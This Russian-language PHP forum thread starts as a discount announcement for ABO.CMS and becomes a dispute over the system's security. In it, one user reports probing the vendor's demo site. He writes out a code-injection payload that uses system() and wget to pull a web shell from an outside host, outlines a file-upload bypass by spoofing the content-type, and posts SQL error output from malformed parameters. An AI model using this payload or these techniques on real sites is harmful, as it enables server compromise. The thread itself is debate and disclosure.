Cкидки на ABO.CMS для всех членов PHP Club!

confguru

ExAdmin
Команда форума
Cкидки на ABO.CMS для всех членов PHP Club!

Cкидки на ABO.CMS для всех членов PHP Club!

Компания ARMEX вводит систему скидок для всех разработчиков сообщества PHP Club (http://phpclub.ru).

Теперь каждый участник PHP Club, зарегистрированный на сайте www.phpclub.ru до 1 сентября получает скидку 30% на любую редакцию системы управления сайтом ABO.CMS.

Система управления сайтом ABO.CMS предназначена для создания и экономичного управления широким спектром интернет-проектов. Современные средства размещения информации, позволяют быстро создать навигационную структуру неограниченной степени вложенности, наполнить нужным контентом, а так же оптимизировать и оформить любую информацию, обладая элементарными навыками пользователя офисных приложений.

Сайт системы: http://abocms.ru
Демо-сайт: http://demo.abocms.ru

Срок данной акции ограничен до 31 октября. Спешите.

Для того, чтобы приобрести систему со скидкой - заполните заявку.
http://abocms.ru/buy30/
 

texrdcom

Новичок
Не кажеться издевательстовм ) ?
Ведь нормальнный разработчик сам может и должен писать а не покупать что то на 30 % дешевле )
 

si

Administrator
itprog
замена контента в CMS при помощи выданого логина-пароля это взлом ?
 

itprog

Cruftsman
si
Насколько я помню там нет редактирования HTML шаблона...
 

Voffka

Guest
"замена контента в CMS при помощи выданого логина-пароля это взлом ? "

там есть дыра в загрузке файлов , во всяком случае была примерно месяц назад , как следствие на сервере теперь хранят зенденую )

а вобще эта система мне нравится , удобная , простая и дизайн легко натянуть хотя в плане доработки оценю на 4 .
/ps - 1 из примеров ооп ради ооп
 
Voffka
Дыры там нет, я знаю о чём говорю...
Тезис о использование ООП ради ООП ничем не обоснован.

-~{}~ 03.10.05 10:23:

itprog
Редактирование HTML шаблона WYSIWYG редактором не приводит к опимальному результату, всегда требуется дорабатывать руками.
 

Voffka

Guest
Автор оригинала: безграмотный
Дыры там нет, я знаю о чём говорю...
уже нет
Тезис о использование ООП ради ООП ничем не обоснован.
PHP:
class AdminPages extends Pages {

	var $module_name = "pages";
	var $main_title;
	var $default_action = "showlist";
	var $default_page_id = -1;


	function AdminPages($action = "")     { 


switch($action)
{

куча кода
типа 
}

}
вот ооп ради ооп )
я не проиивник и не сторонник ооп , я за рациональное применение возможнотей языка и за результат, как в случае або и получилось - система отличная
 
Voffka Здесь представлен класс публичной части, ровно тоже самое было и в классе административной части ABO версии 2.3.

Разработчики начиная с версии 3.0 от подобного подхода постепенно отходят потому обективность Вашего тезиса ооп ради ооп стремиться к нулю...
 

Voffka

Guest
Здесь представлен класс публичной части
нет даже по названию класса AdminPages , можно сказать что это класс административной части )))))))))))))

Разработчики начиная с версии 3.0 от подобного подхода постепенно отходят
Вашего тезиса ооп ради ооп стремиться к нулю
но ведь пока не ушли окончательно ? значит объективность ещё есть , вот когда уйдут тогда объективность вашего тезиса будет 100% а моего 0 )

-~{}~ 04.10.05 09:29:

а вобще "ооп ради ооп" или "ооп ради чегото ещё" какая разница ?
 
Автор оригинала: Voffka
нет даже по названию класса AdminPages , можно сказать что это класс административной части )))))))))))))
Сорри, не заметил, здесь представлен класс административной части ABO.CMS версии 2.3, выпущенной более года назад. В данный момент, как я уже ранее говорил, ничего подобного нет...

а вобще "ооп ради ооп" или "ооп ради чегото ещё" какая разница ?
ООП ради ускорения разработки и поддержания лёгкости развития системы это не тоже самое, что ООП ради ООП ;)
 

Voffka

Guest
кстаи насчёт дыр и грамотности кода (eval итд ) "случано" ввёл в демке http://demo.abocms.ru/ кавычку )))
результат не заставил себя ждать

Рarse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in /home/armex/html/cms-test/mod/****/config.php on line 66

а еслиб туда добрался нуллер ? онбы ввлёл ); system('wget -O webshell.php http://hack.ru/fm.txt'); array(

как и в старых версиях хромает проверка на то что загружают через файл менеджер , указав content-type спокойно заливается php скрипт но тк выполнение php скриптов УЖЕ запрещено в папке с фалами (на плачвном опыте с версией 2 - когда её увели ) то можно залить ssi файл )))

про кличество sql иньекций я молчу тк они в этом случае не нужны

-~{}~ 05.10.05 00:59:

и это после того как их 1 раз ткунли носом в .... (с версией 2.3) всётаки солидная компания ) яб такого програмера ... "отправил на курсы повышения квалификации " )))

-~{}~ 05.10.05 03:08:

и вобще хранение кода в файлах доступных на запись / базе есть очень нехорошо (очень плохо)
 
Автор оригинала: Voffka
кстаи насчёт дыр и грамотности кода (eval итд ) "случано" ввёл в демке http://demo.abocms.ru/ кавычку )))
результат не заставил себя ждать

Рarse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in /home/armex/html/cms-test/mod/****/config.php on line 66
На демосайте лежит обычная ABO.CMS, без защиты от дурака, не вижу проблемы, если не хотеть испортить config.php он не испортиться...

Eval остался с версии 2.3, моё глубокое убеждение, что его необходимо ликвидировать.

а еслиб туда добрался нуллер ? онбы ввлёл ); system('wget -O webshell.php http://hack.ru/fm.txt'); array(
Не сработает, включён safe mode.

как и в старых версиях хромает проверка на то что загружают через файл менеджер , указав content-type спокойно заливается php скрипт но тк выполнение php скриптов УЖЕ запрещено в папке с фалами (на плачвном опыте с версией 2 - когда её увели ) то можно залить ssi файл )))
Не сработает, ssi отключен.

про кличество sql иньекций я молчу тк они в этом случае не нужны
Пример хоть одной SQL инъекции в студию, пока это только трёп...

-~{}~ 05.10.05 00:59:

и это после того как их 1 раз ткунли носом в .... (с версией 2.3) всётаки солидная компания ) яб такого програмера ... "отправил на курсы повышения квалификации " )))
Батенька, версию 2.3 делал другой программер это факт, говорите по существу, про ABO.CMS 3.x

и вобще хранение кода в файлах доступных на запись / базе есть очень нехорошо (очень плохо)
Это только общие слова, ни одного работающего приёма взлома нет...
 

BeGe

Вождь Апачей, блин (c)
безграмотный - Как то php.com.ua привёл пример уязвисомти сайта украинского министерства обороны через SQL инъекцию, если бы мы там изменили хоть один байт данных - нас бы уже посадили со большим красивым судебным процессом на всю украину.
Так что говорить что - если по кавычке есть появлется ошибка - то это можно сказать что есть возможность удалениея всех данных, или DOS через benchmark......

Посмотри... http://php.com.ua/ru/articles/security/sql_injection.htm
грустно становится когда читаешь список сайтов в конце статьи.

А если приводить тебе примеры реальных уязвимостей на рабочем сайте (удаление, отказ в сервисе.....) - тебя просто буду преследовать по закону.
 
Автор оригинала: BeGe ...
если по кавычке есть появлется ошибка - то это можно сказать что есть возможность удалениея всех данных, или DOS через benchmark......
Приведённый пример с кавычкой в ABO.CMS никак не соприкасается с БД. Если кто знает хоть одну SQL инъекцию в ABO прошу скинуть мне её в личку.
 

Voffka

Guest
На демосайте лежит обычная ABO.CMS, без защиты от дурака, не вижу проблемы, если не хотеть испортить config.php он не испортиться...

Eval остался с версии 2.3, моё глубокое убеждение, что его необходимо ликвидировать.
1) в 2.3 не было конфигуратора модулей все настройки хранились в виде массива главном config.php
2) 2безграмотный хватит защищать або и кричать что в ней нет дыр - дыры есть и будут везде , я незнаю какое отношение ты имееш к abo да и меня как и многих это мало волнует , в этой теме я на примере abo показал какие у нас продают комерческие системы .
просьба на флейм не разводить

-~{}~ 05.10.05 16:39:

Database error: Invalid SQL: SELECT * FROM ****** ORDER BY id
MySQL Error: 1064 (You have an error in your SQL syntax near '***' at line 4)

я думаю больше тебе аргументов не надо ..
 
Voffka Ярлыки навесил, но никаких доказательств не предоставил, не хорошо грязью поливать...

Ну и откуда эта ошибка с твоего сайта?
 

Voffka

Guest
http://demo.abocms.ru/admin.php?lang=rus&name=shop

-~{}~ 05.10.05 17:17:

коли хочеш доказательств )

Database error: Invalid SQL: SELECT *, DATE_FORMAT(date,'%d.%m.%Y') as date FROM rus_shop_orders ORDER BY id DESC LIMIT 0,sss
MySQL Error: 1064 (You have an error in your SQL syntax near 'sss' at line 4)
Session halted.

Думаю дельнейшие коментарии с моей стороны излишни.

Ярлыки навесил, но никаких доказательств[/qoute]
Ярлыки я не вешал , я привёл факты(доказательства)
 
Сверху